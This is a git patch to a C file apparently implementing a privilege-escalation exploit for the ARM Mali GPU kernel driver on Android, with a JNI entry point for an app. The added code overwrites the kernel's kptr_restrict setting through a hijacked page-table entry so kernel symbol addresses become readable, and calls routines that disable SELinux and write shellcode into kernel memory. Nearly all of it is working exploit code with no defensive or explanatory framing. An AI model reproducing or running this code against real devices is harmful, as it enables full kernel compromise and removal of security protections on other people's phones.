From fa095e03f37aa7780f391f471b6e9e3263558e23 Mon Sep 17 00:00:00 2001 From: yuu <46545607+mouseos@users.noreply.github.com> Date: Thu, 9 May 2024 13:55:53 +0900 Subject: [PATCH] =?UTF-8?q?kallsyms=E3=82=A2=E3=83=89=E3=83=AC=E3=82=B9?= =?UTF-8?q?=E3=81=8C=E8=AA=AD=E3=82=81=E3=82=8B=E5=87=A6=E7=90=86=E3=82=92?= =?UTF-8?q?=E8=BF=BD=E5=8A=A0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com> --- mali_shrinker_mmap32.c | 21 ++++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index 31c1c22..08bf7d8 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -729,7 +729,21 @@ void spray(int mali_fd) { } } +static uint64_t kptr_restrict = 0x1147178; +void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd, + uint64_t* reserved) { + uint64_t kptr_restrict_addr = + (((kptr_restrict + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), + kptr_restrict_addr, atom_number++, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + usleep(300000); + // shellcode + write_data(mali_fd2, kptr_restrict, reserved, + TOTAL_RESERVED_SIZE / RESERVED_SIZE, 0, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); +} int trigger(int mali_fd, int mali_fd2, int* flush_idx) { if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) { err(1, "Out of memory."); @@ -775,10 +789,15 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000); LOG("Found pgd %d, %llx\n", pgd_idx, pgd); atom_number++; + write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0])); + usleep(100000); + write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0])); usleep(100000); write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); usleep(100000); + + printf("time to run_enforce\n"); run_enforce(); run_enforce_un(); @@ -851,4 +870,4 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi } return -1; } -#endif \ No newline at end of file +#endif \ No newline at end of file